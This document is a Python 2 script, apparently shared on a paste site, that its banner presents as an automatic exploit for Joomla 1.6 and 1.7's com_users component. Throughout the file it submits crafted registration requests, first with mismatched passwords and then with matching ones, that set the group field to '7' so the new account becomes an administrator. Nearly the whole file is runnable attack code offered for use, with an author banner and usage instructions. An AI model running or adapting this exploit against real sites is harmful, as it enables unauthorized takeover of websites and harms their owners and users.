[python] com_user

1. #!/usr/bin/python
2. #coded by el ZinDYanII-tN (2013-2014)
3. #free toolZ
4. import requests as sec4ever, re, urllib, sys, os
5. from threading import Thread
6. from time import sleep
7. def cls():
8.  os.system(['clear','cls'][os.name =='nt'])
9. cls()
10. home = '''
11. |=========================================================================|
12. |=========================================================================|
13. |===========================[ el ZinDYanII-tN ]===========================|
14. |=========================================================================|
15. |=========================================================================|
16. |                                                                         |
17. |    dP""b8  dP"Yb  8b    d8    fucked by    88   88 .dP"Y8 888888 88""Yb |
18. |   dP   `" dP   Yb 88b  d88 el ZinDYanII-tN 88   88 `Ybo." 88__   88__dP |
19. |   Yb      Yb   dP 88YbdP88                 Y8   8P o.`Y8b 88""   88"Yb  |
20. |    YboodP  YbodP  88 YY 88 ooooooooooooooo `YbodP' 8bodP' 888888 88  Yb |
21. |                                                                         |
22. |=========================================================================|
23. |=============[  https://www.facebook.com/XelzindyaniiX  ]================|
24. |=========================================================================|
25. |+++++[ Joomla Version 1.6 and 1.7 Com_User Auto Exploit  add admin ]+++++|
26. |=========================================================================|
27. |=========================================================================|
28. '''
29. print home
30. pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
31. def one(target,pwd1,pwd2,email):
32.     # Wrong Password
33.     x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
34.     token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
35.     post = {}
36.     post["jform[name]"] = 'SunDi3yansyah'
37.     post["jform[username]"] = user
38.     post["jform[password1]"] = pwd1
39.     post["jform[password2]"] = pwd2
40.     post["jform[email1]"] = email
41.     post["jform[email2]"] = email
42.     post["jform[groups][]"] = "7"
43.     post["option"] = "com_users"
44.     post["task"] = "registration.register"
45.     post[token[0]] = "1"
46.     p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
47.     x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
48.  
49. def exploit(target,pwd1,pwd2,email):
50.     # Wrong Password
51.     x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
52.     token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
53.     post = {}
54.     post["jform[name]"] = 'SunDi3yansyah'
55.     post["jform[username]"] = user
56.     post["jform[password1]"] = pwd1
57.     post["jform[password2]"] = pwd1
58.     post["jform[email1]"] = email
59.     post["jform[email2]"] = email
60.     post["jform[groups][]"] = "7"
61.     post["option"] = "com_users"
62.     post["task"] = "registration.register"
63.     post[token[0]] = "1"
64.     p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
65.     x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
66.  
67. xsec = sec4ever.session()
68. if len(sys.argv) == 5:
69.     target = sys.argv[1]
70.     user = sys.argv[2]
71.     pwd1 = sys.argv[3]
72.     email = sys.argv[4]
73.     one(target,pwd1,pwd2,email)
74.     ex = exploit(target,pwd1,pwd2,email)
75.     print ' * exploit don opene http://python-root.blogspot.com \n * Username: '+user+' & Password: '+pwd1
76. else:
77.     print "Usage: python exploit.py http://site.com/ username password email"